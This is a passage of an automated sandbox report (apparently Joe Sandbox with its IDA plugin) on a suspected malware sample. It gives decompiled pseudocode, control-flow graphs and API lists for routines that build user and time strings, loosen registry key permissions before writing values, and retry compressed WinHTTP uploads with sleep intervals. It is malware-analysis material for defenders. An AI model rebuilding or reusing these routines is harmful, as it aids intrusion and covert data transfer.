							_t177 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t177 + 0xf8))))(_t102);
						}
						return _t195;
					} else {
						_push( &_v52);
						_push( &_v12);
						_push( &_v708);
						_t113 = _v24;
						L3:
						_t114 = LookupAccountSidW(_t192, _t113,  &_v1220,  &_v8, ??, ??, ??); // executed
						if(_t114 != 0) {
							_t162 = _v8;
							__eflags = _t162 - _t192;
							if(_t162 > _t192) {
								_t141 = _v12;
								__eflags = _t141 - _t192;
								if(_t141 > _t192) {
									_t154 = E003A1D90(_t141 + _t162 + _t141 + _t162 + 4, _t192);
									memcpy(_t154,  &_v708, _v12 + _v12);
									_t205 = _t154 + _v12 * 2;
									 *_t205 = 0x5c;
									_t206 = _t205 + 2;
									memcpy(_t206,  &_v1220, _v8 + _v8);
									_t208 = _t208 + 0x20;
									__eflags = 0;
									 *((short*)(_t206 + _v8 * 2)) = 0;
								}
							}
							__eflags = _a8 - _t192;
							if(__eflags == 0) {
								_push(0x1e);
							} else {
								_push(0x1d);
							}
							_v36 = E00391C70(__eflags);
							_t116 = E003A1D90(0x7d00, _t192); // executed
							_t196 = _t116;
							_v56 = _t196;
							_t117 = E00399090(__eflags, _t196, 0x16);
							_t211 = _t208 + 0x14;
							_t197 = _t196 + _t117 * 2;
							_t198 = _t197 + E00399090(__eflags, _t197, 0x1b) * 2;
							__eflags = _a8 - _t192;
							if(__eflags == 0) {
								_t204 = _t198 + E00399090(__eflags, _t198, 0x1f) * 2;
								_t139 =  *_t154 & 0x0000ffff;
								_t211 = _t211 + 0x10;
								_t169 = _t154;
								__eflags = _t139 - _t192;
								while(__eflags != 0) {
									_t169 = _t169 + 2;
									 *_t204 = _t139;
									_t139 =  *_t169 & 0x0000ffff;
									_t204 =  &(_t204[0]);
									__eflags = _t139 - _t192;
								}
								_t198 = _t204 + E00399090(__eflags, _t204, 0x20) * 2;
							}
							_t199 = _t198 + E00399090(__eflags, _t198, 0x1c) * 2;
							_t120 = E00399090(__eflags, _t199, 0x17);
							_t200 = _t199 + _t120 * 2;
							__imp___time64( &_v44);
							_v44 = _v44 + 0x3c;
							_t121 =  &_v44;
							asm("adc [ebp-0x24], edi"); // executed
							__imp___localtime64(_t121); // executed
							_v48 = _t121;
							_t193 =  &_v120;
							E00399090(__eflags,  &_v1732, 0x21);
							 *((short*)(_t207 + wcsftime(_t193, 0x1a,  &_v1732, _v48) * 2 - 0x74)) = 0;
							_t125 = _v120;
							_t213 = _t211 + 0x38;
							__eflags = _t125;
							if(__eflags != 0) {
								_t137 = _t125 & 0x0000ffff;
								do {
									_t193 =  &(_t193[0]);
									 *_t200 = _t137;
									_t137 =  *_t193 & 0x0000ffff;
									_t200 =  &(_t200[0]);
									__eflags = _t137;
								} while (__eflags != 0);
							}
							_t126 = E00399090(__eflags, _t200, 0x18);
							_t194 = _v36;
							_t201 = _t200 + _t126 * 2;
							_t127 =  *_t194 & 0x0000ffff;
							_t214 = _t213 + 8;
							_t165 = _t194;
							__eflags = _t127;
							while(_t127 != 0) {
								_t165 =  &(_t165[1]);
								 *_t201 = _t127;
								_t127 =  *_t165 & 0x0000ffff;
								_t201 =  &(_t201[0]);
								__eflags = _t127;
							}
							__eflags = _a8;
							if(__eflags == 0) {
								_t203 = _t201 + E00399090(__eflags, _t201, 0x1f) * 2;
								_t135 =  *_t154 & 0x0000ffff;
								_t216 = _t214 + 8;
								_t168 = _t154;
								__eflags = _t135;
								while(__eflags != 0) {
									_t168 = _t168 + 2;
									 *_t203 = _t135;
									_t135 =  *_t168 & 0x0000ffff;
									_t203 =  &(_t203[0]);
									__eflags = _t135;
								}
								_t136 = E00399090(__eflags, _t203, 0x20);
								_t214 = _t216 + 8;
								_t201 = _t203 + _t136 * 2;
							}
							_t202 = _t201 + E00399090(__eflags, _t201, 0x19) * 2;
							E00398030( &_v28);
							_t166 = _v28;
							_t131 =  *_t166 & 0x0000ffff;
							_t215 = _t214 + 0xc;
							__eflags = _t131;
							while(__eflags != 0) {
								_t166 =  &(_t166[1]);
								 *_t202 = _t131;
								_t131 =  *_t166 & 0x0000ffff;
								_t202 =  &(_t202[0]);
								__eflags = _t131;
							}
							E00399090(__eflags, _t202, 0x1a);
							 *_a4 = _v56;
							_t195 = 1;
							E0039BB40(_t194);
							_t208 = _t215 + 0xc;
							_t192 = 0;
							__eflags = 0;
							goto L32;
						} else {
							return _t114;
						}
					}
				}
			}











































































    0x00395bdc
    0x00395be3
    0x00395be5
    0x00395be7
    0x00395bea
    0x00395bed
    0x00395bf0
    0x00395bf6
    0x00395bf9
    0x00395bfc
    0x00395bff
    0x00395c05
    0x00395c68
    0x00395c7d
    0x00395c88
    0x00395c8a
    0x00395c8c
    0x00000000
    0x00395c92
    0x00395c99
    0x00395cb1
    0x00395cb3
    0x00395cb5
    0x00000000
    0x00395cbb
    0x00395cbe
    0x00395cc8
    0x00395cc9
    0x00395cca
    0x00000000
    0x00395cca
    0x00395cb5
    0x00395c07
    0x00395c07
    0x00395c10
    0x00395c17
    0x00395c18
    0x00395c19
    0x00395c1a
    0x00395c1b
    0x00395c1c
    0x00395c1d
    0x00395c1e
    0x00395c20
    0x00395c25
    0x00395c2a
    0x00395ef2
    0x00395ef2
    0x00395ef5
    0x00395ef7
    0x00395efa
    0x00395eff
    0x00395f02
    0x00395f05
    0x00395f07
    0x00395f0a
    0x00395f15
    0x00395f15
    0x00395f17
    0x00395f1a
    0x00395f1c
    0x00395f1e
    0x00395f2b
    0x00395f2b
    0x00395f35
    0x00395c30
    0x00395c33
    0x00395c3d
    0x00395c3e
    0x00395c3f
    0x00395c42
    0x00395c5b
    0x00395c5f
    0x00395cd5
    0x00395cd8
    0x00395cda
    0x00395cdc
    0x00395cdf
    0x00395ce1
    0x00395cf3
    0x00395d01
    0x00395d09
    0x00395d11
    0x00395d22
    0x00395d26
    0x00395d2e
    0x00395d31
    0x00395d33
    0x00395d33
    0x00395ce1
    0x00395d37
    0x00395d3a
    0x00395d40
    0x00395d3c
    0x00395d3c
    0x00395d3c
    0x00395d50
    0x00395d53
    0x00395d58
    0x00395d5d
    0x00395d60
    0x00395d65
    0x00395d68
    0x00395d73
    0x00395d76
    0x00395d79
    0x00395d83
    0x00395d86
    0x00395d89
    0x00395d8c
    0x00395d8e
    0x00395d91
    0x00395d93
    0x00395d96
    0x00395d99
    0x00395d9c
    0x00395d9f
    0x00395d9f
    0x00395dac
    0x00395dac
    0x00395dba
    0x00395dc0
    0x00395dc9
    0x00395dcc
    0x00395dd2
    0x00395dd6
    0x00395dda
    0x00395ddd
    0x00395dec
    0x00395def
    0x00395df2
    0x00395e0f
    0x00395e14
    0x00395e18
    0x00395e1b
    0x00395e1e
    0x00395e20
    0x00395e23
    0x00395e23
    0x00395e26
    0x00395e29
    0x00395e2c
    0x00395e2f
    0x00395e2f
    0x00395e23
    0x00395e37
    0x00395e3c
    0x00395e3f
    0x00395e42
    0x00395e45
    0x00395e48
    0x00395e4a
    0x00395e4d
    0x00395e50
    0x00395e53
    0x00395e56
    0x00395e59
    0x00395e5c
    0x00395e5c
    0x00395e61
    0x00395e65
    0x00395e6f
    0x00395e72
    0x00395e75
    0x00395e78
    0x00395e7a
    0x00395e7d
    0x00395e80
    0x00395e83
    0x00395e86
    0x00395e89
    0x00395e8c
    0x00395e8c
    0x00395e94
    0x00395e99
    0x00395e9c
    0x00395e9c
    0x00395ea7
    0x00395eae
    0x00395eb3
    0x00395eb6
    0x00395eb9
    0x00395ebc
    0x00395ebf
    0x00395ec1
    0x00395ec4
    0x00395ec7
    0x00395eca
    0x00395ecd
    0x00395ecd
    0x00395ed5
    0x00395ee1
    0x00395ee3
    0x00395ee8
    0x00395eed
    0x00395ef0
    0x00395ef0
    0x00000000
    0x00395c67
    0x00395c67
    0x00395c67
    0x00395c5f
    0x00395c2a

    APIs
    • LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00395C5B
    • memcpy.MSVCRT ref: 00395D01
    • memcpy.MSVCRT ref: 00395D26
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • _time64.MSVCRT ref: 00395DCC
    • _localtime64.MSVCRT ref: 00395DDD
    • wcsftime.MSVCRT ref: 00395E07
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003B0640, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122registry

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 378 3b0640-3b0655 379 3b065c-3b068c StrChrW RegOpenKeyExW 378->379 380 3b0657 378->380 381 3b0782-3b0787 379->381 382 3b0692-3b06b3 GetSecurityInfo 379->382 380->379 383 3b06b9-3b06f5 call 3980a0 StrChrW RegOpenKeyExW 382->383 384 3b076e-3b0780 382->384 388 3b0718-3b0738 SetNamedSecurityInfoW 383->388 389 3b06f7-3b0716 RegSetValueExW 383->389 384->381 390 3b073a-3b075a 388->390 391 3b075c-3b076b 388->391 389->388 390->391 391->384
    C-Code - Quality: 100%
    			E003B0640(WCHAR* __ebx, short* _a4, char _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				long _t30;
				intOrPtr _t31;
				int _t32;
				char _t40;
				intOrPtr _t41;
				int _t42;
				WCHAR* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t58;
				int _t73;
				signed int _t74;

				_t50 = __ebx;
				_t74 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_a8 != 0) {
					_t74 = 0x100;
				}
				_t30 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), 0, _t74 | 0x00020019,  &_v12); // executed
				if(_t30 == 0) {
					_t31 =  *0x3b8628; // 0x593938
					_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x1ac))))(_v12, 4, 4, _t30, _t30,  &_a8, _t30, _t30); // executed
					_t73 = _t32;
					if(_t73 == 0) {
						E003980A0(_v12, 4); // executed
						_t40 = RegOpenKeyExW(0x80000002,  &((StrChrW(_t50, 0x5c))[1]), _t73, _t74 | 0x0002001f,  &_v8); // executed
						if(_t40 == 0) {
							_v16 = _t40;
							RegSetValueExW(_v8, _a4, _t73, 4,  &_v16, 4); // executed
						}
						_t41 =  *0x3b8628; // 0x593938
						_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x1a4))))(_t50, 4, 4, 0, 0, _a8, 0); // executed
						_t73 = _t42;
						if(_t73 != 0) {
							_t58 =  *0x3b8628; // 0x593938
							_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1a8))))(_v8, 4, 4, 0, 0, _a8, 0);
						}
						_t57 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x198))))(_v8);
					}
					_t54 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x198))))(_v12);
					return _t73;
				}
				return _t30;
			}


















    0x003b0640
    0x003b0649
    0x003b064c
    0x003b064f
    0x003b0655
    0x003b0657
    0x003b0657
    0x003b0688
    0x003b068c
    0x003b069d
    0x003b06ad
    0x003b06af
    0x003b06b3
    0x003b06bf
    0x003b06f1
    0x003b06f5
    0x003b06ff
    0x003b0716
    0x003b0716
    0x003b071b
    0x003b0732
    0x003b0734
    0x003b0738
    0x003b0740
    0x003b075a
    0x003b075a
    0x003b075f
    0x003b076c
    0x003b076c
    0x003b0771
    0x003b077e
    0x00000000
    0x003b0780
    0x003b0787

    APIs
    • StrChrW.SHLWAPI(?,0000005C), ref: 003B0673
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B0688
    • GetSecurityInfo.ADVAPI32(?,00000004,00000004,00000000,00000000,00000000,00000000,00000000), ref: 003B06AD
      • Part of subcall function 003980A0: memset.MSVCRT ref: 00398128
      • Part of subcall function 003980A0: SetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 003981A5
    • StrChrW.SHLWAPI(?,0000005C), ref: 003B06D6
    • RegOpenKeyExW.KERNEL32(80000002,-00000002), ref: 003B06F1
    • RegSetValueExW.KERNEL32(?,?,00000000,00000004,?,00000004), ref: 003B0716
    • SetNamedSecurityInfoW.ADVAPI32(?,00000004,00000004,00000000,00000000,?,00000000), ref: 003B0732
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003944B0, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310sleep

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 393 3944b0-394501 call 395000 398 39453f-394545 393->398 399 394503-394506 393->399 400 39454b-394553 398->400 401 394600-394616 398->401 399->398 402 394508-394533 call 399090 399->402 400->401 404 394559-394582 call 3a1d90 * 2 400->404 409 394618-394624 401->409 410 39468d 401->410 402->398 416 394535 402->416 404->401 420 394584-394586 404->420 414 39468a 409->414 415 394626-394639 409->415 412 394694-3946a9 410->412 425 3946af-3946b2 412->425 426 3947c3 412->426 414->410 418 394640-394648 415->418 416->398 421 39464a-394650 418->421 422 394660-394662 418->422 420->401 427 394588-3945c3 call 395970 call 397600 420->427 421->422 428 394652-39465c 421->428 423 39466c-394673 422->423 424 394664-394667 422->424 423->414 430 394675-394688 423->430 424->423 431 3946b4-3946c7 call 3b1280 425->431 432 3947c6-3947c8 426->432 448 3945e2-3945f1 call 39bb40 * 2 427->448 449 3945c5-3945df 427->449 428->418 429 39465e 428->429 429->424 430->412 445 3946c9-3946d3 ??2@YAPAXI@Z 431->445 446 3946de-3946e8 ??2@YAPAXI@Z 431->446 432->401 435 3947ce-3947d4 432->435 437 3947df-3947e4 435->437 438 3947d6-3947dc call 39bb40 435->438 443 3947ef-3947f4 437->443 444 3947e6-3947ec call 39bb40 437->444 438->437 453 3947ff-394804 443->453 454 3947f6-3947fc call 39bb40 443->454 444->443 451 3946f3 445->451 455 3946d5-3946dc call 3b1dc0 445->455 450 3946ea-3946ec call 3b1d30 446->450 446->451 448->401 449->448 468 3946f1 450->468 460 3946f5-39470b 451->460 462 39480f-394814 453->462 463 394806-39480c call 39bb40 453->463 454->453 455->460 479 394718-39471e 460->479 480 39470d-394711 460->480 464 39481f-394835 call 39bb40 462->464 465 394816-39481c call 39bb40 462->465 463->462 481 394840-394871 464->481 482 394837-39483d ??3@YAXPAX@Z 464->482 465->464 468->460 484 394771-39477e 479->484 485 394720 479->485 480->431 483 394713-394716 480->483 482->481 483->484 484->435 486 394780-394798 484->486 487 394722-394740 call 3990f0 485->487 489 39479a-3947ad 486->489 490 3947af-3947c1 Sleep 486->490 492 394745-394747 487->492 489->432 490->432 493 394749-394760 492->493 494 394767 492->494 493->487 499 394762-394765 493->499 497 39476e 494->497 497->484 499->497
    C-Code - Quality: 91%
    			E003944B0(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				char _v28;
				signed int _v32;
				char _v1056;
				void* __ebx;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t94;
				intOrPtr _t96;
				intOrPtr _t104;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr* _t129;
				intOrPtr _t131;
				signed int* _t132;
				unsigned int _t134;
				void* _t137;
				void* _t141;
				intOrPtr _t147;
				void* _t149;
				intOrPtr* _t150;
				intOrPtr _t151;
				intOrPtr _t158;
				signed int _t162;
				intOrPtr _t165;
				intOrPtr _t169;
				signed int _t172;
				signed short* _t173;
				signed int _t180;
				intOrPtr _t181;
				intOrPtr _t185;
				signed int _t193;
				void* _t204;
				signed int _t205;
				void* _t207;
				void* _t209;
				intOrPtr _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				intOrPtr* _t214;
				void* _t215;
				void* _t216;
				void* _t219;

				_t209 = __esi;
				_t204 = __edi;
				E00395000( &_v28);
				_t90 =  *0x3b8628; // 0x593938
				_v16 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0xac))))(0x3b8594, _t149);
				_t92 =  *0x3b8628; // 0x593938
				_t180 =  *0x3b857c; // 0x1
				_v12 = _t180;
				 *((intOrPtr*)( *((intOrPtr*)(_t92 + 0xc4))))(0x3b8594);
				_t181 =  *0x3b8584; // 0x1
				_t150 = _a4;
				if(_t181 == 0) {
					_t222 =  *((intOrPtr*)(_t150 + 4)) - _t181;
					if( *((intOrPtr*)(_t150 + 4)) != _t181) {
						E00399090(_t222,  &_v1056, 0xb);
						_t147 =  *0x3b8628; // 0x593938
						_t215 = _t215 + 8;
						_push( &_v1056);
						_push( *((intOrPtr*)(_t150 + 4)));
						if( *((intOrPtr*)( *((intOrPtr*)(_t147 + 0xe0))))() == 0) {
							 *0x3b8584 = 1;
						}
					}
				}
				_push(_t209);
				_push(_t204);
				if( *((intOrPtr*)(_t150 + 0x10)) != 0) {
					_t134 =  *(_t150 + 0x14);
					if(_t134 >= 0x100000) {
						_v8 = (_t134 >> 4) + _t134 + 0x4c;
						_t214 = E003A1D90((_t134 >> 4) + _t134 + 0x4c, 0);
						_t137 = E003A1D90(0x10000, 0);
						_t208 = _t137;
						_t215 = _t215 + 0x10;
						if(_t137 != 0 && _t214 != 0) {
							_push(4);
							E00395970(_t137, 0x1040, 2, 4, 4, 4, 4, 4, 4, 4);
							_v8 = _v8 - 8;
							_t22 = _t214 + 8; // 0x8
							_t141 = E00397600(_t22,  *((intOrPtr*)(_t150 + 0x10)),  *(_t150 + 0x14), _t22,  &_v8, _t208);
							_t219 = _t215 + 0x3c;
							if(_t141 == 0) {
								 *_t214 = 0x4150495a;
								 *(_t214 + 4) =  *(_t150 + 0x14);
								 *((intOrPtr*)(_t150 + 0x10)) = _t214;
								_t214 =  *((intOrPtr*)(_t150 + 0x10));
								 *(_t150 + 0x14) = _v8 + 8;
							}
							E0039BB40(_t214);
							E0039BB40(_t208);
							_t215 = _t219 + 8;
						}
					}
				}
				do {
					_t94 =  *0x3b8628; // 0x593938
					 *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xac))))(0x3b8594);
					if(_v12 < 0) {
						L23:
						_v12 = 0xffffffff;
						L24:
						_t96 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0xc4))))(0x3b8594);
						_t50 =  &_v12;
						 *_t50 = _v12 + 1;
						if( *_t50 == 0) {
							_t210 = _v8;
							goto L47;
						}
						_t205 = _v32;
						_t210 = 0;
						do {
							_t114 = E003B1280(0,  &_v1056);
							_t216 = _t215 + 4;
							_push(0x1c);
							if(_t114 == 0) {
								L0039A47E();
								_t215 = _t216 + 4;
								__eflags = _t114;
								if(_t114 == 0) {
									L31:
									_t115 = 0;
									__eflags = 0;
									L32:
									_v20 = _t115;
									_push(_t205);
									_push( &_v1056);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))() != 0) {
										_v8 = _t210;
										__eflags = _t210 - 5;
										if(__eflags >= 0) {
											L42:
											_t162 = _v16 + 1;
											_v16 = _t162;
											if(_t162 > 0x4b0) {
												goto L48;
											}
											if(_t162 != (0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2) + ((0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2)) * 4 + (0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2) + ((0x66666667 * _t162 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t162 >> 0x20 >> 2)) * 4) {
												Sleep(0x3e8); // executed
											} else {
												_t165 =  *0x3b8628; // 0x593938
												 *((intOrPtr*)( *((intOrPtr*)(_t165 + 0xc8))))(0xea60);
											}
											goto L47;
										}
										_t212 = 0;
										__eflags = 0;
										while(1) {
											_t129 = E003990F0(_t150,  *((intOrPtr*)(_t150 + 0x18)), _t205, _t212,  &_v28,  *_t150,  *((intOrPtr*)(_t150 + 4)),  *((intOrPtr*)(_t150 + 8)),  *((intOrPtr*)(_t150 + 0xc)),  *((intOrPtr*)(_t150 + 0x10)),  *(_t150 + 0x14)); // executed
											__eflags = _t129;
											if(__eflags != 0) {
												break;
											}
											_t169 =  *0x3b8628; // 0x593938
											 *((intOrPtr*)( *((intOrPtr*)(_t169 + 0xc8))))(0x3e8);
											_t212 = _t212 + 1;
											__eflags = _t212 - 3;
											if(__eflags < 0) {
												continue;
											}
											_v8 = _t212;
											L41:
											_t210 = _v8;
											goto L42;
										}
										_v8 = 0;
										goto L41;
									}
									goto L33;
								}
								_t115 = E003B1D30(_t114); // executed
								goto L32;
							}
							L0039A47E();
							_t215 = _t216 + 4;
							if(_t114 == 0) {
								goto L31;
							}
							_t115 = L003B1DC0(_t114);
							goto L32;
							L33:
							_t210 = _t210 + 1;
						} while (_t210 < 5);
						_v8 = _t210;
						goto L42;
					}
					_t151 =  *((intOrPtr*)(_t150 + 0x18));
					_t131 =  *((intOrPtr*)(_t151 + 8));
					_t172 = _v12;
					if(_t172 >=  *((intOrPtr*)(_t131 + 0x18))) {
						L22:
						_t150 = _a4;
						goto L23;
					}
					_t173 =  *( *((intOrPtr*)(_t131 + 0x1c)) + _t172 * 4);
					_t213 = 0x200;
					_t132 =  &_v1056;
					_t207 = 0;
					while(1) {
						_t39 = _t213 + 0x7ffffdfe; // 0x7ffffffe
						if(_t39 == 0) {
							break;
						}
						_t193 =  *_t173 & 0x0000ffff;
						if(_t193 == 0) {
							break;
						}
						 *_t132 = _t193;
						_t132 =  &(_t132[0]);
						_t173 =  &(_t173[1]);
						_t213 = _t213 - 1;
						if(_t213 != 0) {
							continue;
						}
						L19:
						_t132 = _t132 - 2;
						_t207 = 0x8007007a;
						L20:
						 *_t132 = 0;
						if(_t207 < 0) {
							goto L22;
						}
						_t150 = _a4;
						_v32 =  *( *((intOrPtr*)( *((intOrPtr*)(_t151 + 8)) + 0x20)) + _v12 * 4) & 0x0000ffff;
						goto L24;
					}
					__eflags = _t213;
					if(__eflags != 0) {
						goto L20;
					}
					goto L19;
					L47:
				} while (_t210 > 0);
				L48:
				_t98 =  *_t150;
				if( *_t150 != 0) {
					E0039BB40(_t98);
					_t215 = _t215 + 4;
				}
				_t99 =  *((intOrPtr*)(_t150 + 4));
				if( *((intOrPtr*)(_t150 + 4)) != 0) {
					E0039BB40(_t99);
					_t215 = _t215 + 4;
				}
				_t100 =  *((intOrPtr*)(_t150 + 8));
				if( *((intOrPtr*)(_t150 + 8)) != 0) {
					E0039BB40(_t100);
					_t215 = _t215 + 4;
				}
				_t101 =  *((intOrPtr*)(_t150 + 0x10));
				if( *((intOrPtr*)(_t150 + 0x10)) != 0) {
					E0039BB40(_t101);
					_t215 = _t215 + 4;
				}
				_t102 =  *((intOrPtr*)(_t150 + 0xc));
				if( *((intOrPtr*)(_t150 + 0xc)) != 0) {
					E0039BB40(_t102);
					_t215 = _t215 + 4;
				}
				E0039BB40(_t150);
				_t104 = _v20;
				_v28 = 0x3b32ec;
				if(_t104 != 0) {
					_push(_t104);
					L00391CB0();
				}
				_t185 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t185 + 0xac))))(0x3b8600);
				_t158 =  *0x3b8628; // 0x593938
				 *0x3b8618 =  *0x3b8618 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t158 + 0xc4))))(0x3b8600);
				return 0;
			}

















































    0x003944b0
    0x003944b0
    0x003944bd
    0x003944c2
    0x003944d2
    0x003944d9
    0x003944db
    0x003944e0
    0x003944f1
    0x003944f4
    0x003944f6
    0x003944fc
    0x00394501
    0x00394503
    0x00394506
    0x00394511
    0x00394519
    0x0039451e
    0x00394527
    0x0039452e
    0x00394533
    0x00394535
    0x00394535
    0x00394533
    0x00394506
    0x00394543
    0x00394544
    0x00394545
    0x0039454b
    0x00394553
    0x00394565
    0x00394574
    0x00394576
    0x0039457b
    0x0039457d
    0x00394582
    0x00394588
    0x0039459f
    0x003945a7
    0x003945b3
    0x003945b9
    0x003945be
    0x003945c3
    0x003945c5
    0x003945ce
    0x003945da
    0x003945dd
    0x003945df
    0x003945df
    0x003945e3
    0x003945e9
    0x003945ee
    0x003945ee
    0x00394582
    0x00394553
    0x00394600
    0x00394600
    0x00394610
    0x00394616
    0x0039468d
    0x0039468d
    0x00394694
    0x00394694
    0x003946a4
    0x003946a6
    0x003946a6
    0x003946a9
    0x003947c3
    0x00000000
    0x003947c3
    0x003946af
    0x003946b2
    0x003946b4
    0x003946bb
    0x003946c0
    0x003946c3
    0x003946c7
    0x003946de
    0x003946e3
    0x003946e6
    0x003946e8
    0x003946f3
    0x003946f3
    0x003946f3
    0x003946f5
    0x003946f5
    0x003946fd
    0x00394704
    0x0039470b
    0x00394718
    0x0039471b
    0x0039471e
    0x00394771
    0x00394774
    0x00394775
    0x0039477e
    0x00000000
    0x00000000
    0x00394798
    0x003947bf
    0x0039479a
    0x0039479a
    0x003947ab
    0x003947ab
    0x00000000
    0x00394798
    0x00394720
    0x00394720
    0x00394722
    0x00394740
    0x00394745
    0x00394747
    0x00000000
    0x00000000
    0x00394749
    0x0039475a
    0x0039475c
    0x0039475d
    0x00394760
    0x00000000
    0x00000000
    0x00394762
    0x0039476e
    0x0039476e
    0x00000000
    0x0039476e
    0x00394767
    0x00000000
    0x00394767
    0x00000000
    0x0039470b
    0x003946ec
    0x00000000
    0x003946ec
    0x003946c9
    0x003946ce
    0x003946d3
    0x00000000
    0x00000000
    0x003946d7
    0x00000000
    0x0039470d
    0x0039470d
    0x0039470e
    0x00394713
    0x00000000
    0x00394713
    0x00394618
    0x0039461b
    0x0039461e
    0x00394624
    0x0039468a
    0x0039468a
    0x00000000
    0x0039468a
    0x00394629
    0x0039462c
    0x00394631
    0x00394637
    0x00394640
    0x00394640
    0x00394648
    0x00000000
    0x00000000
    0x0039464a
    0x00394650
    0x00000000
    0x00000000
    0x00394652
    0x00394655
    0x00394658
    0x0039465b
    0x0039465c
    0x00000000
    0x00000000
    0x00394664
    0x00394664
    0x00394667
    0x0039466c
    0x0039466e
    0x00394673
    0x00000000
    0x00000000
    0x00394682
    0x00394685
    0x00000000
    0x00394685
    0x00394660
    0x00394662
    0x00000000
    0x00000000
    0x00000000
    0x003947c6
    0x003947c6
    0x003947ce
    0x003947ce
    0x003947d4
    0x003947d7
    0x003947dc
    0x003947dc
    0x003947df
    0x003947e4
    0x003947e7
    0x003947ec
    0x003947ec
    0x003947ef
    0x003947f4
    0x003947f7
    0x003947fc
    0x003947fc
    0x003947ff
    0x00394804
    0x00394807
    0x0039480c
    0x0039480c
    0x0039480f
    0x00394814
    0x00394817
    0x0039481c
    0x0039481c
    0x00394820
    0x00394825
    0x0039482b
    0x00394835
    0x00394837
    0x00394838
    0x0039483d
    0x00394840
    0x00394851
    0x00394853
    0x00394859
    0x0039486a
    0x00394871

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 003946C9
    • ??2@YAPAXI@Z.MSVCRT ref: 003946DE
    • ??3@YAXPAX@Z.MSVCRT ref: 00394838
      • Part of subcall function 003B1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B1D73
    • Sleep.KERNELBASE(000003E8), ref: 003947BF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
